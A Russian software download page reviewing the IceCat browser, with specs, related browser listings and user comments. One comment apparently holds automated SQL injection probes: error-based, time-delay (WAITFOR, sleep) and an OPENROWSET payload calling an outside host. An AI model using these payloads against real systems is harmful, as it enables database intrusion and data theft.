Программы для Windows


IceCat - браузер от Фаерфокс.

Категория: Браузеры

IceCat - браузер от Фаерфокс.


IceCat — если вы ищите не самый многофункциональный браузер, напичканный многочисленными дополнениями, но обладающий всем необходимым для серфинга в сети, рекомендуем попробовать IceCat. Это не очередной браузер на движке Хромиум, за основу взята платформа от Фаерфокса. 100% совместимость с оригинальной «Лисой» и всеми сопутствующими для нее дополнениями гарантирована.

Интерфейс также не блещет оригинальностью и во многом напоминает Мозиллу. Не нужно разбираться в настройках, поскольку они структурированы аналогичным образом. Безопасность, защита от «левых» ресурсов. Отсутствие установки. Браузер IceCat можно смело ставить для постоянной или временной работы.

Почему стоит делать выбор в пользу IceCat браузер, а не классической Мозиллы? Во-первых, разработчики сделали свой файл конфигурации. То есть, пользователю даже не нужно выбирать один из двух браузеров. Во-вторых, они успешно совместно работают, что дает колоссальное количество функций даже самому требовательному пользователю. В IceCat Browser концепция свободного оформления. Пользователю не нужно беспокоиться за конфиденциальность своего серфинга в сети. Есть поддержка таких опций, как SpyBlock, HTTPS и LibreJS.

Нет необходимости докупать какие-либо плагины или новые оболочки для дизайна браузера. У IceCat есть свой сервис, где можно бесплатно скачать плагины «на любой вкус и цвет». Все пароли при подтверждении пользователем сохраняются в браузере. В дальнейшем при необходимости к ним не составляет труда получить доступ.

Есть поддержка ряда популярных приложений, которые позволяют быстро отправить письма на электронную почту, просматривать документы в формате PDF. Присутствует определенный функционал для рендеринга видеоматериала.

Такой стандартный функционал, как история страниц, многочисленные закладки присутствует. При желании историю можно выключить. Для этого активируется функция «приватного просмотра». Таким образом, можно избавиться от лишнего кэша и многочисленных ссылок, в которых нет необходимости.

Некоторые пользователи сталкиваются с отсутствием русского языка. Проблема имеет одно решение — вы должны загрузить LangPack с нужным вам языком. Русификация в IceCat RU будет выступать в роли одного дополнения для браузерной программы. Скачать IceCat бесплатный браузер от Фаерфокс, можно по ссылке ниже.

Ссылка на загрузку

Версия: 38.8
Разработчик: IceCat
Год релиза: 2017
Поддерживаемые ОС: Windows 10, 7, XP, 8.
Языки интерфейса: Английский
Размер файла: 42.3 Мб


Похожие бесплатные программы:

Pirate Browser - браузер для обхода блокировок сайтов.
Pirate Browser — работая с данным браузером, вам не составит труда получить доступ к любом веб-ресурсу (даже если он запрещен на территории той или иной страны). ....

Kinza Browser - японский простой браузер.
Kinza Browser – на первый взгляд, ничем не примечательный бесплатный браузер. Для его разработки создатели использовали привычный движок «Хромиум», на котором стоит огромное количество идентичных ....

Скачать 360 Browser бесплатный браузер на движке ВебКит.
360 Browser (360 Браузер) – современный веб-браузер для безопасного пользования ресурсами Интернета. Программа создана на основе проекта Chromium, который стал фундаментом для создания популярных ....

SRWare Iron бесплатный русский браузер на движке Хромиум.
SRWare Iron – веб-обозреватель, предоставляющий великолепные возможности для безопасного и максимально комфортного веб серфинга. Это современный браузер, который часто называют обозревателем ....

Браузер Mozilla Firefox скачать бесплатный Фаерфокс.
Скачать Браузер Firefox (Мазила Фаерфокс) разработанный компанией Mozilla и является бесплатным браузером, с достаточно простым интерфейсом, разобраться в его работе будет совсем не сложно. Многие ....



Коментарии



Maro | Гости

Сложно выбрать один браузер. Все они достойны первого места. Самый лучший из них, это браузер Opera (версия для windows 8.1)
9 июля 2018 20:07
wzzw | Гости

для windows 8.1 есть только 3 отличных браузера - Epic ,Cent - оба portabl версии и Maiar. все 3 браузера у меня установлены.
15 июня 2019 23:35
Smith | Гости

3[left][/left][center][/center][right][/right][hide][/hide]


(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';'
9;a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','dyr3ifv6ragbswk7uhkpapzcckfej33xffpotbts'
+'o7c.r87.me')exec sp_executesql @r

' WAITFOR DELAY '0:0:25'-- /* 9276e07b-6556-4fb9-850d-0b23f751bbcb */

'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 13447b1d-661e-471e-98b3-4e4b507e0f83 */
11 октября 2022 18:20
Панель добавления отзыва
Ваше Имя:


Ваш E-Mail:



Мне нравится Relizua
Группа Вконтакте